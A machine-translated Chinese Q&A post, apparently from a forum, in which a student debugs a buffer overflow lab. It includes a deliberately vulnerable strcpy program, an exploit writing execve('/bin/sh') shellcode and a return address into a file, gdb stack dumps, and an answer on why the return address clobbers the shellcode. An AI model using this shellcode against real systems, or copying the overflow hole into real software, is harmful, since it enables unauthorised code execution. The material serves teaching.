获取SIGILL试图执行缓冲区溢出攻击

Question

我正在为我的安全等级我的缓冲区溢出项目时，我想我拥有了一切树立正确的，但是当我运行它，我得到：

Program received signal SIGILL, Illegal Instruction. 
0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22 
22  fread(str,sizeof(char),517,badfile); 

继承人stack.c

int bof(char *str) 
{ 
    char buffer[12]; 
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str); 
    return 1; 
} 

int main(int argc, char **argv) 
{ 
    char str[517]; 
    FILE *badfile; 
    badfile = fopen("badfile", "r"); 
    fread(str, sizeof(char), 517, badfile); 
    bof(str); 
    printf("Returned Properly\n"); 
    return 1; 
} 

这里是exploit.c

char code[]= 

"\x31\xc0"      // xorl   %eax,%eax 

"\x50"       // pushl  %eax 

"\x68\x6e\x2f\x73\x68"   // pushl  $0x68732f6e 

"\x68\x2f\x2f\x62\x69"   // pushl  $0x69622f2f 

"\x89\xe3"      // movl   %esp,%ebx 

"\x99"       // cltd 

"\x52"       // pushl  %edx 

"\x53"       // pushl  %ebx 

"\x89\xe1"      // movl   %esp,%ecx 

"\xb0\x0b"      // movb   $0xb,%al 

"\xcd\x80"      // int   $0x80 

; 

char retaddr[] = "\x70\xF2\xFF\xBF"; 

void main(int argc, char **argv) 
{ 
    char strr[517]; 
    strr[0] = 'Z'; 
    strr[1] = 0; 
    strr[2] = '\x00'; 
    char buffer[517]; 
    FILE *badfile; 

    /* Initialize buffer with 0x90 (NOP instruction) */ 
    memset(buffer, 0x90, 517); 

    /* You need to fill the buffer with appropriate contents here */ 
    //memcpy(buffer, "EGG=", 4); 

    memcpy(buffer, code, 24); 

    memcpy(buffer+20,retaddr,4); 

    memcpy(buffer+24,"\x00\x00\x00\x00",4); 


    /* Save the contents to the file "badfile" */ 
    badfile = fopen("./badfile", "w"); 
    fwrite(buffer,517,1,badfile); 
    fclose(badfile);  
} 

这是在运行时堆栈。 启动程序：/家庭/ JOHN /堆栈

Breakpoint 1, bof (
str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277") 
at stack.c:13 
13  strcpy(buffer, str); 
(gdb) x/12xw $esp 
0xbffff270: 0x00000205 0xbffff298 0x004a13be 0x0804b008 
0xbffff280: 0xbffff2b7 0x00000205 0xb7fef6c0 0x00584ff4 
0xbffff290: 0x00000000 0x00000000 0xbffff4c8 0x0804850f 
(gdb) s 
14  return 1; 
(gdb) x/12xw $esp 
0xbffff270: 0xbffff284 0xbffff2b7 0x004a13be 0x0804b008 
0xbffff280: 0xbffff2b7 0x6850c031 0x68732f6e 0x622f2f68 
0xbffff290: 0x99e38969 0xe1895352 0xbffff270 0x08048500 
(gdb) c 
Continuing. 

任何想法，为什么我收到SIGILL？

Answer 1

因为您正在执行非法代码。在您的exploit.c中，用覆盖返回地址覆盖偏移20-23 - 这些字节先前是b0 0b cd 80，对应于最后两个mov $0xb,%al和int $0x80指令。你输入的零字节是非法代码。

由于返回地址必须在该目标的特定偏移量处进行，因此您需要修改shell代码以避免使用该数据。我建议将shell代码移动到该偏移量之后并指向返回地址，或者跳过返回地址以便处理器不尝试执行它。